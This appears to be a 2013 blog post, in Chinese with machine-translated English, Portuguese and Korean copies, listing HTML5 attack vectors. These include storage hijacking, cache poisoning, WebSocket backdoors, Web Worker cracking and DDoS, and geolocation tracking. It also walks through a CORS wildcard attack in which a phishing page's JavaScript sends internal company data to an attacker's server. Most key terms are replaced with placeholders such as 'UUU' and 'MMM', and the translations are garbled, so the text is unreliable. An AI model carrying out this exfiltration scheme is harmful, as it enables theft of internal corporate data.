每次被運用時就會發起攻擊。
Offline Web VVV
透過UUUe機制可以指定網頁於離線操作使用
UUUe BBBning:
汙染UUUe內容,
導致使用該網頁中的某些功能是被刻意修改過的。
Piiiiick Vs:將攻擊程式放置於UUUe的應用程式中。
User BBBggg:於離線時還可以追蹤用戶操作行為。
Web Messaging
文件中及MM文件傳遞訊息的功能
可能會導致不同頁面間資料的洩漏,
徒增攻擊接觸面。
例如在網頁中使用MMM便可以透過此功能獲取原始頁面之訊息。
Web UUU
可以達到MM網域(非同源)的UUU與訊息傳輸,
而不須事先取得用戶的授權同意。
連線時亦不會有任何訊息通知。
可實作網頁中的遠端命令列,
UUUl等於是從網頁中開後門。
已經有使用此功能之Web-GGGGt的實作。
用來做網頁式的連接埠(port)掃描工具。
YYY API
l 透過GPS硬體取得座標
l 透過無線網路與手機網路取得座標(AGPS)
l 從IP位置判斷區域
取得用戶的精確位置,
配合Google ZZZ功能,
尚可取得ZZZ資訊(未證實,技術上可行)
Web JJJs
使得網頁中的javascript可以進行多工KKK作業(KKKd)
l 透過用戶的瀏覽器進行大量KKK破解
l 可用於DggS或DDgS工具的實作
UUU MMMs
由rrrr端主動發送訊息與---
---資料到用戶端瀏覽器的機制
可用於TTTC&WWWC的中中中控制HTML5為基礎的受害者..
==============================================**USA-en-*
Note: All of the articles are examples [I have modified all the "noun" and "URL" / "script" ]The following is a security threat finishing table with several HTML5 features that may occur: Type - Description Possible problems with AHHHk vs Web Storage Local Storage: the rule is to take homologous (samy) Protection Act GGGn Storage: Just browse page Close is deleted SXXX hijacking: clllllln hijacking, The connection made mmmme FFFFnt information and hijacking of. UUUe of MMMial Data: d VVVVVve information exposed, to obtain data stored in storage. User oooing: placement track user behavior information in the storage medium.KKKck: The program placed in storage in the attack, Every attack will be utilized when. Offline Web VVV You can specify the mechanism through UUUe pages in offline use UUUe BBBning: Pollution UUUe content Led to the use of the Web Some features are deliberately modified. Piiiiick Vs: The Attack of the program is placed in UUUe application. User BBBggg: offline Shihai can track user actions behavior. Web YYYYng MM HHH and file transfer functions message May cause leakage between the different pages of information, RRRRces. For example, in a web page using the MMM can get the message of
the original page using this function. Web UUU
You can reach MM (non-homologous) UUUon and MMM transmission, Without having to obtain prior consent of the user's authorization. There will not be any message notification when the connection. Web pages can implement remote command line UUUl tantamount to open the back door from the page. Use this function has been Web-GGGGt implementation. Used to make Web-port (port) scanning tool. YYY API l get coordinates via GPS hardware l get coordinates through a wireless network and mobile phone network (AGPS) l to determine the position of the region from the IP Obtain precise position of the user, With Google ZZZ function, ZZZ can still get information (not confirmed, technically feasible) Web JJJs Javascript make web pages can be multi KKK job (KKKd) l extensive KKK break through the user's browser l can be used to implement tools DggS or DDgS UUU MMMs By the end of the initiative to send a message with rrrr --- --- Data to the client browser mechanism TTTC & WWWC can be used in the HTML5-based victims .. ============================================
*PTG(Macau)-FDZ.-*Nota: Todos os artigos são exemplos [ eu modifiquei todos os " substantivo " e " URL " / " roteiro "A seguir está uma tabela de acabamento ameaça de segurança com vários recursos do HTML5 que podem ocorrer :Tipo - DescriçãoPossíveis problemas com AHHHk vsweb StorageArmazenamento local : regra homólogo é tomar ( sameFFFy ) Lei de ProteçãoGGGn Armazenamento: Basta navegar página Fechar é eliminadoSXXX hijacking : sequestro de conexãoA conexão feita de informação de gestão de armazenamento e sequestro de .UUUe de Dados MMMial :Informação sensível propriedade exposta , para obter os dados armazenados no armazenamento.Oooing Usuário: informações comportamento do usuário pista colocação no meio de armazenamento.PRRRRt Ataque:O programa colocado no armazenamento no ataque,Cada ataque será utilizado quando .Desligado Web VVVVocê pode especificar o mecanismo através de páginas UUUe em uso offlineUUUe BBBning :Conteúdo Poluição UUUeLevou ao uso da Web Algumas características são deliberadamente modificadas.Piiiiick Vs : O Ataque do programa é colocado em aplicação UUUe .BBBggg usuário : off-line Shihai pode rastrear o comportamento ações do usuário.web MessagingFunções de transferência de documentos e de arquivos de mensagens MMPode causar vazamento entre as diferentes páginas de informação ,Convidando superfícies de contato de ataque.Por exemplo, em uma página da web usando o MMM pode obter a mensagem da página original usando esta função.UUU web
Você pode chegar a MM de conexão ( não- homólogo ) e transmissão de HHH,Sem ter que obter o consentimento prévio de autorização do usuário.Não haverá qualquer notificação de mensagem quando a ligação .Páginas da Web podem implementar linha de comando remotoUUUl equivale a abrir a porta de trás da página.Use esta função tem sido a implementação Web- GGGGt .Usado para fazer Web -port ( porto ), ferramenta de digitalização.API YYYl obter coordenadas via hardware de GPSl obter as coordenadas através de uma rede sem fio e rede de telefonia móvel ( AGPS )l para determinar a posição da região a partir da IPObter a posição exacta do utilizador ,Com a função de ZZZ Google,ZZZ ainda pode obter informação ( não confirmada, tecnicamente viável )JJJs webJavascript tornar as páginas web podem ser multi trabalho KKK ( KKKd )l extensa pausa KKK através do navegador do usuáriol pode ser usado para implementar ferramentas DggS ou DDGSUUU MMMsAté o final de a iniciativa de enviar uma mensagem com rrrr ------ Dados para o mecanismo de navegador de clienteTTTC & WWWC pode ser utilizado nas vítimas baseados em HTML 5 de controlo ..==============================================
*KR-*참고 : 모든 기사가 나는 모든 "명사"를 수정하고 "URL"/ "스크립트"있다 [예입니다 다음은 발생할 수있는 몇 가지 HTML5의 기능을 가진 보안 위협 마무리 테이블입니다 : 유형 - 설명 AHHHk 가능한 문제 대 웹 UUU 지역 HHH : RRR 규칙 (samFFFy) 보호법을하는 것입니다 GGGn HHH : 그냥 페이지 닫기가 삭제 검색 SXXX 하이재킹 : 연결 하이재킹, sJJJ에게의 연결 관리 정보와 납치를 바로 확인해보세요. MMMial의 UUUe : 스토리지에 저장된 데이터를 얻기 위해 노출 소유 중요한 정보. 사용자 oooing : 기억 매체에 배치 궤도 사용자 행동 정보. PRRRRt 공격 : 공격 스토리지에 배치 프로그램, 모든 공격 할 때 사용됩니다. 오프라인 웹 VVV 오프라인 사용 UUUe 페이지를 통해 메커니즘을 지정할 수 있습니다 UUUe BBBning : 오염 UUUe 내용 일부 기능은 의도적으로 수정 된 웹의 사용되었다. Piiiiick 대 : 프로그램의 공격은 UUUe 응용 프로그램에 배치됩니다. 사용자 BBBggg : 오프라인 Shihai는 사용자 작업의 동작을 추적 할 수 있습니다. 웹 메시징 MM 문서 및 파일 전송 기능 메시지 정보의 다른 페이지 사이에 누출을 일으킬 수 있음, 공격 접촉면을 초대. 예를 들어, MMM을 사용하여 웹 페이지에이 기능을 이용하여 일본어 페이지 메시지를 얻을 수있다. 웹 UUU
당신은 MM 도메인 (TTT 소스) 연결과 메시지 전송에 도달 할 수 있습니다 EE와 사용자의 사전 승인을 얻을 필요없이 어떤 메시지 알림 연결이되지 않습니다. 웹 페이지는 원격 명령 라인을 구현할 수있다 UUUl 페이지에서 다시 문을 열 동등. 이 기능을 사용하면 웹 GGGGt 구현하고있다. 웹 포트 (포트) 검색 도구를 만드는 데 사용됩니다. YYY의 API 리터 get은 GPS 하드웨어를 통해 좌표 리터 get은 무선 네트워크를 통해 좌표와 이동 전화 네트워크 (AGPS) IP에서 영역의 위치를 결정하기 위해 L 사용자의 정확한 위치를 확보, 구글 ZZZ 기능으로, ZZZ는 여전히 정보를 얻을 수 있습니다 (확인되지, 기술적으로 가능) 웹 JJJs 웹 페이지 다 KKK 작업이 될 수 있습니다 자바 스크립트 메이크업 (KKKd) 사용자의 브라우저를 통해 L 광범위한 KKK 휴식 난 도구 DggS 또는 정박을 구현하는 데 사용할 수 있습니다 UUU MMMs RRRR있는 메시지를 보낼 수있는 이니셔티브의 말 --- --- 클라이언트 브라우저기구에 데이터 TTTC & WWWC는 제어 HTML5 기반의 피해자에서 사용할 수 있습니다 .. ==============================================
三、訪問內部服務器:
很多互聯網公司除了有ONLINE對外的業務之外,
在內部也用著很多的應用,
如財務管理系統、
員工管理系統以及其他的一些內部社區等,
很多開發者為了各個應用之間調用簡潔方便,
在很多應用中都添加了以下頭:
控制 - 允許 - 原產地:*
攻擊者可以利用社會工程學,
讓內部用戶點擊一個鏈接,
然後攻擊者就可以訪問到內部的一些資源,
以下為操作步驟:
1、員工登錄到內部的某應用,如www.interVVVl.com
2、intCCCl服務器返回的響應頭設置了MMM-JJJ-TTTin:
*(允許任何域發起的請求都可以獲取當前服務器的數據。)
3、員工受到一封郵件,
點擊了鏈接– www.mali.com
4、這個站點包含了正常的UI內容,
所以員工一般不會察覺,
但是,該頁麵包含了一段javascript代碼。
5、該javascript代碼會發送一個XMLHttpRequest請求。
6、分析返回的數據包,並把它發送到攻擊者的服務器。
7、攻擊者獲取到公司內部站點的相關信息。
*USA-en-**8, after clicking Hijack SeeeXXXX, the following screen will appear: . Third, access to internal servers: Many Internet companies in addition to external business outside ONLINE, Also used a lot of in-house applications, Such as financial management systems, Staff management system and some other internal communities, Many developers to call between applications is simple and convenient, In many applications have added the following headers: Control - allows - Origin: * An attacker could exploit social engineering, Allow internal users to click on a link, Then the attacker can gain access to the interior of some of the resources, The following is the procedure: 1, employees log on to the inside of an application, such as www.interVVVl.com 2, intCCCl server returns the response header set MMM-JJJ-TTTin: * (Allows any request can be initiated by the domain to get the current data server.) 3, employees receive an e-mail, Click on the link - www.mali.com 4, this site contains the normal UI content, So employees are generally not aware of, However, the page contains some javascript code. 5, the javascript code to send an XMLHttpRequest request. 6, the analysis of the returned data packet and sends it to the attacker's server. 7, the attacker access to the relevant information within the company site. *
-------------------------------------------------------------
*PTG(Macau)-FDZ.-*8, após clicar Hijack SeeeXXXX, a seguinte tela será exibida: . Em terceiro lugar, o acesso aos servidores internos: Muitas companhias de internet, além de negócios externos, fora ONLINE Também é usado um monte de aplicativos in-house, Tais como sistemas de gestão financeira, Sistema de gestão de pessoal e algumas outras comunidades internas, Muitos desenvolvedores para chamar entre aplicativos é simples e conveniente, Em muitas aplicações foram adicionados os seguintes cabeçalhos: Controle - permite - Origem: * Um invasor pode explorar a engenharia social, Permitir que usuários internos a clicar em um link, Em seguida, o atacante pode ganhar acesso ao interior de uma parte dos recursos, O seguinte é o procedimento: 1, empregados logon no interior de uma aplicação, como www.interVVVl.com 2, o servidor intCCCl retorna o cabeçalho de resposta definido MMM-JJJ-TTTin: * (Permite que qualquer pedido pode ser iniciada pelo domínio para ter o servidor de dados atual.) 3, os funcionários recebem um e-mail, Clique no link - www.mali.com 4, este site contém o conteúdo da interface do usuário normal, Assim, os funcionários geralmente não estão cientes, No entanto, a página contém algum código javascript. 5, o código javascript para enviar uma solicitação XMLHttpRequest. 6, a análise do pacote de dados retornados e envia para o servidor do invasor. 7, o invasor acesse a informação relevante no site da empresa. *
-----------------------------------------------------------------------------------------
*KR-*8 공중 납치 SeeeXXXX을 클릭 한 후, 다음과 같은 화면이 나타납니다 : . 내부 서버에 셋째, 액세스 : 온라인 외부 외부 비즈니스뿐만 아니라 많은 인터넷 기업, 또한 사내 응용 프로그램을 많이 사용 금융 관리 시스템으로, 직원 관리 시스템 및 다른 내부 공동체 응용 프로그램 사이에서 호출하는 대부분의 개발자는, 간단하고 편리하다 많은 응용 프로그램에서 다음과 같은 헤더를 추가했습니다 : 제어 - 수 - 원산지 : * 공격자는 사회 공학을 악용 할 수 있습니다, 내부 사용자가 링크를 클릭 할 수 있도록, 그 후 공격자는 그 중 일부의 내부에 액세스 할 수있다, 다음은 절차입니다 : 1, 직원은 www.interVVVl.com 같은 응용 프로그램의 내부에 로그온 2, intCCCl 서버는 MMM-JJJ-TTTin을 설정 응답 헤더를 반환합니다 : * (모든 요청은 현재의 데이터 서버를 얻을 수있는 도메인에 의해 개시 될 수 있습니다.) 3, 직원은 전자 메일을 수신, www.mali.com - 링크를 클릭 4,이 사이트는 일반적인 UI 내용을 포함, 그래서 직원은 일반적으로 인식하지 않습니다, 그러나 페이지는 일부 자바 스크립트 코드가 포함되어 있습니다. 5, XMLHttpRequest의 요청을 보낼 수있는 자바 스크립트 코드입니다. 6, 반환 된 데이터 패킷의 분석 및 공격자의 서버로 전송한다. 7, 회사 사이트 내에서 관련 정보에 공격자가 액세스 할 수 있습니다. *
*註 : 所有本文章均為範例[我已修改了全部"名詞"及"網址"/"指令碼"]*Note: All of the articles are examples [I have modified all the "noun" and "URL" / "script"]
**"小型網站--最易遭受黑客攻擊的三種攻擊方式!!2013年11月最新情報~!*&"新技術新威脅-"HTML5攻擊新手法--2013年10月22日"~!**USA-en*-* " Small sites - ! ! ! ! Most vulnerable to hacker attacks in three attacks in November 2013 the latest intelligence ~ * &" new technologies and new threats - "HTML5 attack new tricks - October 22, 2013"~!*--*PTG(macau-FDZone)*-* " Pequenos locais - ! Mais vulneráveis a ataques de hackers em três ataques , em novembro de 2013, a mais recente inteligência ~ * &" novas tecnologias e novas ameaças - "ataque HTML5 novos truques - 22 de outubro de 2013 "~!*--*KR*-- * " 작은 사이트 - ! ! 2013년 11월 최신 정보 ~ * & 세 공격 에서 해커의 공격 에 가장 취약 "- " HTML5 공격 새로운 트릭 - 2013년 10월 22일 "~ 새로운 기술과 새로운 위협 !!*=Melodysexy===THE END===>/
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
沒有留言:
張貼留言
if you like make fds, wellcome you here~~anytime***
my free place for everyones who want the good software,
come & download them~ wellcome!!